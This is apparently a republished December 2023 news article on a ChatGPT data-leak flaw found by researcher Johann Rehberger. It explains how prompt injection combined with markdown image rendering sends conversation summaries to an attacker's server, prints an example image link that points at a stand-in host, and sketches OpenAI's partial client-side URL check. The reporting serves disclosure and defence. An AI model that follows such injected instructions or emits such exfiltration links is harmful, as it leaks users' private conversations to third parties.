OpenAI rolls out imperfect fix for ChatGPT data leak flaw

OpenAI has mitigated a data exfiltration bug in ChatGPT that could leak conversation details to an external URL. According to the researcher who discovered the flaw, the mitigation isn't perfect, so attackers can still exploit it under certain conditions.
The safety checks have yet to be implemented in the iOS mobile app for ChatGPT, so the risk on that platform remains unaddressed.
Security researcher Johann Rehberger discovered a technique to exfiltrate data from ChatGPT and reported it to OpenAI in April 2023.
In November 2023, the researcher shared additional information on creating malicious GPTs that leverage the flaw to phish users and decided to disclose his findings publicly, writing that it "seems best to share this with the public to raise awareness."
The data theft relies on prompt injection combined with image markdown rendering: the attack requires the victim to submit a malicious prompt that the attacker either supplied directly or posted somewhere for victims to discover and use.
Alternatively, as Rehberger demonstrated, a malicious GPT can be used, and its users would not realize that their conversation details, along with metadata and technical data, are being exfiltrated to third parties.
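For illustration only, an injected instruction of this kind typically tells the model to summarize the conversation and embed that summary in a markdown image URL pointing at a server the attacker controls (the domain and parameter name below are hypothetical):

    ![loading](https://attacker.example/collect?q=<URL-encoded summary of the conversation>)

Because the chat interface renders markdown images by fetching their URLs, the data in the query string reaches the attacker's server as soon as the response is displayed, with no click required from the victim.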
After Rehberger publicized the flaw details on his blog, OpenAI responded by implementing client-side checks, performed via a call to a validation API, that prevent images from unsafe URLs from being rendered.
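OpenAI has not published details of this check, but conceptually the mitigation works along the following lines; the endpoint name, parameters, and response shape in this sketch are assumptions for illustration, not OpenAI's actual API:

    // Hypothetical sketch of a client-side "validate before render" flow (TypeScript).
    async function renderImageIfSafe(url: string): Promise<void> {
      // Ask a server-side validation endpoint whether the URL may be rendered
      // (endpoint path and response shape are assumed for illustration).
      const res = await fetch(`/api/url_safe?url=${encodeURIComponent(url)}`);
      const { safe } = (await res.json()) as { safe: boolean };

      if (!safe) {
        // URLs that fail the check are never rendered, so no request is made
        // to the attacker-controlled domain.
        return;
      }

      const img = document.createElement("img");
      img.src = url; // Only validated URLs trigger an outbound image request.
      document.body.appendChild(img);
    }

Because the check runs in the client rather than on the model's output, a client that does not implement it, such as the iOS app at the time of writing, still renders the image and leaks the data.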
The researcher notes that ChatGPT still renders requests to arbitrary domains in some cases, so the attack can still succeed, with inconsistent results observed even when testing the same domain.
Because the specifics of the check that determines whether a URL is safe are unknown, the exact cause of these discrepancies cannot be determined.
Rehberger also notes that exploiting the flaw is now noisier, subject to data transfer rate limits, and works much more slowly.
He adds that the client-side validation call has yet to be implemented in the iOS mobile app, so the attack remains completely unmitigated there.
It is also unclear whether the fix has been rolled out to the ChatGPT Android app, which has over 10 million downloads on Google Play.


This Cyber News was published on www.bleepingcomputer.com. Publication date: Thu, 21 Dec 2023 16:45:14 +0000

